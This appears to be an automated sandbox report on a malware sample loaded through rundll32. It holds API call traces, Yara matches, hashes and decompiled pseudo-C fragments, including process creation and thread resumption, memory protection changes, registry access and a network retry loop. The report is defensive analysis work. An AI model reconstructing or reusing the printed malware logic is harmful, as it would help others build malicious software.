                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                          • String ID:
                                          • API String ID: 1672627171-0
                                          • Opcode ID: f47238913afe98c22002bc493c57a99b1dc8ec7526c14e4473b79cd0bcaa8ea5
                                          • Instruction ID: 0612eab776ef16ce0bc81461f14fb3594da59341dd7e81fb240a1581b352e925
                                          • Opcode Fuzzy Hash: f47238913afe98c22002bc493c57a99b1dc8ec7526c14e4473b79cd0bcaa8ea5
                                          • Instruction Fuzzy Hash: 7FF09076601E14ABDA11A75CEC04E9B37DDEB84B24F0D4E12F500D7111DA74ED428765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B59A62
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B59A9E
                                            • Part of subcall function 00B6E376: lstrlen.KERNEL32(?,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3C4
                                            • Part of subcall function 00B6E376: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3D6
                                            • Part of subcall function 00B6E376: lstrcpy.KERNEL32(00000000,?), ref: 00B6E3E5
                                            • Part of subcall function 00B6E376: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3F6
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 1872894792-0
                                          • Opcode ID: 36df150891ddb4fdf2cdadadcede8c3d414c5097d75a202c95741bd2f4dde17a
                                          • Instruction ID: 39cc9c73f7cb47b5070779d47d16c1608e6392234800bd69b2e97060fbac9008
                                          • Opcode Fuzzy Hash: 36df150891ddb4fdf2cdadadcede8c3d414c5097d75a202c95741bd2f4dde17a
                                          • Instruction Fuzzy Hash: D1F06C766412159F87306F589D85875FBE8FB8931631581DAED1953321CB615C41C6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InterlockedIncrement.KERNEL32(00B7907C), ref: 00B6F94B
                                            • Part of subcall function 00B65CA1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B65CCC
                                            • Part of subcall function 00B65CA1: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00B65CD9
                                            • Part of subcall function 00B65CA1: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00B65D65
                                            • Part of subcall function 00B65CA1: GetModuleHandleA.KERNEL32(00000000), ref: 00B65D70
                                            • Part of subcall function 00B65CA1: RtlImageNtHeader.NTDLL(00000000), ref: 00B65D79
                                            • Part of subcall function 00B65CA1: RtlExitUserThread.NTDLL(00000000), ref: 00B65D8E
                                          • InterlockedDecrement.KERNEL32(00B7907C), ref: 00B6F96F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                          • String ID:
                                          • API String ID: 1011034841-0
                                          • Opcode ID: 95fa07fd034d5ad9a67866157d7ab9d8d49ebf46dc981f2e7e288922697872d0
                                          • Instruction ID: c2315497a3d91deebc47cd7a32c98f3e3b33f37ee01092364530e0d1e5b1d218
                                          • Opcode Fuzzy Hash: 95fa07fd034d5ad9a67866157d7ab9d8d49ebf46dc981f2e7e288922697872d0
                                          • Instruction Fuzzy Hash: C7E01A31284336F7DF216BF4BD04BBAA6D2EB14B61F4044B4F59AD10E0C728CC50C6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04893D23(signed int __edx, intOrPtr _a4) {
                                          				void* _t3;
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t8;
                                          				void* _t9;
                                          				signed int _t10;
                                          
                                          				_t10 = __edx;
                                          				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x489a2d8 = _t3;
                                          				if(_t3 == 0) {
                                          					_t8 = 8;
                                          					return _t8;
                                          				}
                                          				 *0x489a1c8 = GetTickCount();
                                          				_t5 = E0489515F(_a4);
                                          				if(_t5 == 0) {
                                          					_t5 = E048939B5(_t9, _a4); // executed
                                          					if(_t5 == 0) {
                                          						if(E04896729(_t9) != 0) {
                                          							 *0x489a300 = 1; // executed
                                          						}
                                          						_t7 = E04892C52(_t10); // executed
                                          						return _t7;
                                          					}
                                          				}
                                          				return _t5;
                                          			}









                                          0x04893d23
                                          0x04893d2c
                                          0x04893d32
                                          0x04893d39
                                          0x04893d3d
                                          0x00000000
                                          0x04893d3d
                                          0x04893d4a
                                          0x04893d4f
                                          0x04893d56
                                          0x04893d5c
                                          0x04893d63
                                          0x04893d6c
                                          0x04893d6e
                                          0x04893d6e
                                          0x04893d78
                                          0x00000000
                                          0x04893d78
                                          0x04893d63
                                          0x04893d7d

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04893DA8,?), ref: 04893D2C
                                          • GetTickCount.KERNEL32 ref: 04893D40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapTick
                                          • String ID:
                                          • API String ID: 2177101570-0
                                          • Opcode ID: a66b99f4d30ec611c665c83403b7c09360a511cf377fd6108492e7b75f240b31
                                          • Instruction ID: 32da25917dce33caf10d833b7ca4bbd9a784d39c9f566cb702daa726f0889573
                                          • Opcode Fuzzy Hash: a66b99f4d30ec611c665c83403b7c09360a511cf377fd6108492e7b75f240b31
                                          • Instruction Fuzzy Hash: 28F0EDB0244F02BEEF212F759D55B197AE4AF08748F1C4E29ED47D4190EFB5EC009626
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B63D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63DC1
                                            • Part of subcall function 00B63D88: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B63DF7
                                            • Part of subcall function 00B63D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B63E03
                                            • Part of subcall function 00B63D88: lstrcmpi.KERNEL32(?,00000000), ref: 00B63E40
                                            • Part of subcall function 00B63D88: StrChrA.SHLWAPI(?,0000002E), ref: 00B63E49
                                            • Part of subcall function 00B63D88: lstrcmpi.KERNEL32(?,00000000), ref: 00B63E5B
                                            • Part of subcall function 00B63D88: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B63EAC
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,00B750E8,0000002C,00B5B707,06148E36,?,00000000,00B5A3F0), ref: 00B647ED
                                            • Part of subcall function 00B51C78: GetProcAddress.KERNEL32(?), ref: 00B51CA1
                                            • Part of subcall function 00B51C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 00B51CC3
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,00B750E8,0000002C,00B5B707,06148E36,?,00000000,00B5A3F0,?,00000318), ref: 00B64878
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                          • String ID:
                                          • API String ID: 4138075514-0
                                          • Opcode ID: 190e93ad82cc102f02d5f17c2ca2855e5109ad20d880399256e4633e6b5c4f4e
                                          • Instruction ID: aa475cc62ffd0666d3144b4b380f11ad64762b4cb4e56be04e911e5a5373e789
                                          • Opcode Fuzzy Hash: 190e93ad82cc102f02d5f17c2ca2855e5109ad20d880399256e4633e6b5c4f4e
                                          • Instruction Fuzzy Hash: 0121D371D01228ABCF519FA5DC84ADEBBB4FF48B20F10816AF918B6150C7345A45DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000001,00000000,76D84D40,?,?,00000000,00B63333,?,?,?,?,?,?,?,00B5BF69), ref: 00B6CB65
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7a2c116e448e091824565bc01bea0804819a86be768400ab68980978f71019c6
                                          • Instruction ID: efc2efcd531f9b232684143302f0be24fc8bdc7f6f97b4e85bc6fac76801dd48
                                          • Opcode Fuzzy Hash: 7a2c116e448e091824565bc01bea0804819a86be768400ab68980978f71019c6
                                          • Instruction Fuzzy Hash: 92319272A40209EFCF10DF98D885AADBBF5FB44724F5480EAE249AB311C774AD45CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E0489215A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                          				signed int _v5;
                                          				signed int _v12;
                                          				void* _t32;
                                          				signed int _t37;
                                          				signed int _t39;
                                          				signed char _t45;
                                          				void* _t49;
                                          				char* _t51;
                                          				signed int _t65;
                                          				signed int _t66;
                                          				signed int _t69;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t69 = __eax;
                                          				_t32 = RtlAllocateHeap( *0x489a2d8, 0, __eax << 2); // executed
                                          				_t49 = _t32;
                                          				if(_t49 == 0) {
                                          					_v12 = 8;
                                          				} else {
                                          					 *_a8 = _t49;
                                          					do {
                                          						_t45 =  *_a4;
                                          						asm("cdq");
                                          						_t65 = 0x64;
                                          						_t37 = (_t45 & 0x000000ff) / _t65;
                                          						_v5 = _t37;
                                          						if(_t37 != 0) {
                                          							 *_t49 = _t37 + 0x30;
                                          							_t49 = _t49 + 1;
                                          							_t45 = _t45 + _t37 * 0x9c;
                                          						}
                                          						asm("cdq");
                                          						_t66 = 0xa;
                                          						_t39 = (_t45 & 0x000000ff) / _t66;
                                          						if(_t39 != 0 || _v5 != _t39) {
                                          							 *_t49 = _t39 + 0x30;
                                          							_t49 = _t49 + 1;
                                          							_t45 = _t45 + _t39 * 0xf6;
                                          						}
                                          						_a4 = _a4 + 1;
                                          						 *_t49 = _t45 + 0x30;
                                          						 *(_t49 + 1) = 0x2c;
                                          						_t49 = _t49 + 2;
                                          						_t69 = _t69 - 1;
                                          					} while (_t69 != 0);
                                          					_t51 = _t49 - 1;
                                          					 *_a12 = _t51 -  *_a8;
                                          					 *_t51 = 0;
                                          				}
                                          				return _v12;
                                          			}














                                          0x0489215f
                                          0x04892164
                                          0x04892172
                                          0x04892178
                                          0x0489217c
                                          0x048921ed
                                          0x0489217e
                                          0x04892182
                                          0x04892185
                                          0x04892188
                                          0x0489218f
                                          0x04892190
                                          0x04892191
                                          0x04892193
                                          0x04892198
                                          0x0489219f
                                          0x048921a5
                                          0x048921a6
                                          0x048921a6
                                          0x048921ad
                                          0x048921ae
                                          0x048921af
                                          0x048921b3
                                          0x048921bf
                                          0x048921c5
                                          0x048921c6
                                          0x048921c6
                                          0x048921c8
                                          0x048921ce
                                          0x048921d0
                                          0x048921d5
                                          0x048921d6
                                          0x048921d6
                                          0x048921dc
                                          0x048921e5
                                          0x048921e7
                                          0x048921ea
                                          0x048921f9

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04892172
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5cae7e779592acaefe05c3774debcdaad599b02f280b38124bff4c116ca3a66d
                                          • Instruction ID: baabd4d575386afbcc1fb63f52cf66ffd28bba18b84d73805a118066622ce48c
                                          • Opcode Fuzzy Hash: 5cae7e779592acaefe05c3774debcdaad599b02f280b38124bff4c116ca3a66d
                                          • Instruction Fuzzy Hash: E1113631245341AFEB0A8F29C841BE97BA9DB53318F1841CEE540CB292C277A90BC760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B53049
                                            • Part of subcall function 00B65D9D: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00B79420), ref: 00B65DB4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleInformationModuleProcessQuery
                                          • String ID:
                                          • API String ID: 2776635927-0
                                          • Opcode ID: 51bd3cd61a1289d22493f50c992cef7178dbd66ac9d43751ab5b14aa8a9250ac
                                          • Instruction ID: 4d9a074e9f25d2ca016c68ff2903dbc7f9b41427ac317ea8d32d6a6cf3f23890
                                          • Opcode Fuzzy Hash: 51bd3cd61a1289d22493f50c992cef7178dbd66ac9d43751ab5b14aa8a9250ac
                                          • Instruction Fuzzy Hash: 60213B31600309AFDB209F99D880BAA77E5EF44BD171844EAED458B290D771EE489B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04895347(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                          				intOrPtr _v12;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v60;
                                          				char _v68;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t14;
                                          				signed int* _t16;
                                          				signed int _t25;
                                          				signed int _t26;
                                          				signed int* _t28;
                                          				signed int _t30;
                                          
                                          				_t28 = __ecx;
                                          				_t14 =  *0x489a368; // 0x5249618
                                          				_v12 = _t14;
                                          				_t16 = _a12;
                                          				_t30 = 8;
                                          				if(_t16 != 0) {
                                          					 *_t16 =  *_t16 & 0x00000000;
                                          				}
                                          				do {
                                          					_t31 =  &_v68;
                                          					if(E048924BC( &_v68) == 0) {
                                          						goto L16;
                                          					}
                                          					_t30 = E04894BD6(_t31, _a4, _v12);
                                          					if(_t30 == 0) {
                                          						_t25 = E0489595A(_t31, 0x102, _t28, _t30); // executed
                                          						_t30 = _t25;
                                          						if(_t30 != 0) {
                                          							if(_t30 == 0x102) {
                                          								E0489A000 = E0489A000 + 0xea60;
                                          							}
                                          						} else {
                                          							if(_v24 != 0xc8) {
                                          								_t30 = 0xe8;
                                          							} else {
                                          								_t26 = _v20;
                                          								if(_t26 == 0) {
                                          									_t30 = 0x10d2;
                                          								} else {
                                          									_t28 = _a8;
                                          									if(_t28 != 0) {
                                          										_v60 = _v60 & _t30;
                                          										 *_t28 = _v60;
                                          										_t28 = _a12;
                                          										if(_t28 != 0) {
                                          											 *_t28 = _t26;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					E048915B9( &_v68, 0x102, _t28, _t30);
                                          					L16:
                                          				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x489a30c, 0) == 0x102);
                                          				return _t30;
                                          			}

                                          APIs
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76DC81D0), ref: 048953F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait
                                          • String ID:
                                          • API String ID: 24740636-0
                                          • Opcode ID: 26f799c3cffa7707eed52112780ef8ccd5bd208a9b7c5a90255822c4469f7085
                                          • Instruction ID: 5ce9d91fe35412f082284043b4b3f8d3e9fd700e30c7641d6b1580f1f0fee57a
                                          • Opcode Fuzzy Hash: 26f799c3cffa7707eed52112780ef8ccd5bd208a9b7c5a90255822c4469f7085
                                          • Instruction Fuzzy Hash: 92219D33700A09ABEF129E6DD880A6E77E5EB81354F5C4E29E802D7240EBB4ED15D751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B5FE75
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 666db354c3fbca599e5d8807aeeb530da1e9bfa02bedaa12446096734df134ad
                                          • Instruction ID: d98af4824540761aa7ba35fabd685f9887ca1d3f6a75ef3cf69ae7fb359e07dd
                                          • Opcode Fuzzy Hash: 666db354c3fbca599e5d8807aeeb530da1e9bfa02bedaa12446096734df134ad
                                          • Instruction Fuzzy Hash: 90111B3220020AAFDF029FA9DC41ADA7BA6EF08371B058175FE2C96161CB31DD25DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E04896D05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x489a348; // 0x9ad5a8
                                          				_t4 = _t15 + 0x489b39c; // 0x5248944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x489b124; // 0x650047
                                          				_t17 = E048969D2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E04891109(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}

                                          APIs
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                            • Part of subcall function 04891109: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04892B23,004F0053,00000000,?), ref: 04891112
                                            • Part of subcall function 04891109: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04892B23,004F0053,00000000,?), ref: 0489113C
                                            • Part of subcall function 04891109: memset.NTDLL ref: 04891150
                                          • SysFreeString.OLEAUT32(00000000), ref: 04896D68
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: e50bab01ae90b98d43ac2e4dbb4990ae3a4a27f4517fe9414ba300184a01f582
                                          • Instruction ID: a28c6d0ca3c30d9df2ec54ade68e5697668bf2d8da6de82f6dd415067e62bd67
                                          • Opcode Fuzzy Hash: e50bab01ae90b98d43ac2e4dbb4990ae3a4a27f4517fe9414ba300184a01f582
                                          • Instruction Fuzzy Hash: E1015EB1500929BFDF119FA8CC04DAABBF8FB04654F084A25E915E6160F771AD11D791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E0489267F(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                          				char _v8;
                                          				void* _t14;
                                          				intOrPtr _t17;
                                          				void* _t20;
                                          				void* _t26;
                                          
                                          				_push(__ecx);
                                          				if(_a4 == 0 || __eax == 0) {
                                          					_t26 = 0x57;
                                          				} else {
                                          					_t14 = E0489215A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                          					_t26 = _t14;
                                          					if(_t26 == 0) {
                                          						_t17 =  *0x489a348; // 0x9ad5a8
                                          						_t9 = _t17 + 0x489ba38; // 0x444f4340
                                          						_t20 = E0489250D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                          						_t26 = _t20;
                                          						RtlFreeHeap( *0x489a2d8, 0, _a4); // executed
                                          					}
                                          				}
                                          				return _t26;
                                          			}

                                          APIs
                                            • Part of subcall function 0489215A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04892172
                                            • Part of subcall function 0489250D: lstrlen.KERNEL32(76DDF710,?,00000000,?,76DDF710), ref: 04892541
                                            • Part of subcall function 0489250D: StrStrA.SHLWAPI(00000000,?), ref: 0489254E
                                            • Part of subcall function 0489250D: RtlAllocateHeap.NTDLL(00000000,?), ref: 0489256D
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,048961F6), ref: 048926D5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Allocate$Freelstrlen
                                          • String ID:
                                          • API String ID: 2220322926-0
                                          • Opcode ID: db1e58844af2774f1b849c92c211c86434a4fbb6cc6a8d2d1d874fbb2e8837da
                                          • Instruction ID: 3c45b417c1dabd9c54786fc7254145382f8c39ae62d4fe092c23ec7a9432d86c
                                          • Opcode Fuzzy Hash: db1e58844af2774f1b849c92c211c86434a4fbb6cc6a8d2d1d874fbb2e8837da
                                          • Instruction Fuzzy Hash: 0C01AD76200908FFDF129F48DC00E9A77E9EB44390F184A65FA09C6560EB71FE90DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04897291(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				intOrPtr _t14;
                                          				void* _t16;
                                          				void* _t17;
                                          				void* _t18;
                                          
                                          				if(_a4 == 0) {
                                          					L2:
                                          					_t18 =  *0x489a0c8(_a8, _a12,  &_a4);
                                          					if(_t18 == 0) {
                                          						RegCloseKey(_a4);
                                          					}
                                          					L4:
                                          					return _t18;
                                          				}
                                          				_t14 =  *0x489a348; // 0x9ad5a8
                                          				_t2 = _t14 + 0x489b180; // 0x720043
                                          				_t16 = E048969D2(_t17, _a4, _a8, _a12, _t2, 0, 0, 0); // executed
                                          				_t18 = _t16;
                                          				if(_t18 == 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}

                                          APIs
                                          • RegCloseKey.ADVAPI32(00000000,?,04893DF0,3D048990,00000000,80000002,?,80000002,?,?,?,04896ECE,80000002), ref: 048972DA
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseFreeString
                                          • String ID:
                                          • API String ID: 3574410727-0
                                          • Opcode ID: 0ee64867ae1264c323b966c69009fb5a4807cb10afd694e0db33272b0f6e6231
                                          • Instruction ID: a95fe906792ab4cf5dacba25cb4c71f773925527633d715b1a42968afcc9ce40
                                          • Opcode Fuzzy Hash: 0ee64867ae1264c323b966c69009fb5a4807cb10afd694e0db33272b0f6e6231
                                          • Instruction Fuzzy Hash: 53F03A32110A18FBDF229E84DC05FA93BA8FB04B90F188920FE089A160C731ED609B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B516A1: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516C0
                                            • Part of subcall function 00B516A1: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516CB
                                            • Part of subcall function 00B516A1: _wcsupr.NTDLL ref: 00B516D8
                                            • Part of subcall function 00B516A1: lstrlenW.KERNEL32(00000000), ref: 00B516E0
                                          • ResumeThread.KERNEL32(00000004,?,00B5C793,?), ref: 00B63111
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                          • String ID:
                                          • API String ID: 3646851950-0
                                          • Opcode ID: 8c7f0661f49c88f43a3d1a3755c0d2c6bf48983af432099d8ef8022500ba861a
                                          • Instruction ID: 3454cf52ddfb4e77d40dfd5095b96363e0dcc4c6125ca73c2a6527779d0bd071
                                          • Opcode Fuzzy Hash: 8c7f0661f49c88f43a3d1a3755c0d2c6bf48983af432099d8ef8022500ba861a
                                          • Instruction Fuzzy Hash: F3D0A734244301E6EB213720CD1AB16BED0EF19F49F00C8E4FD89615B0C7398890E505
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
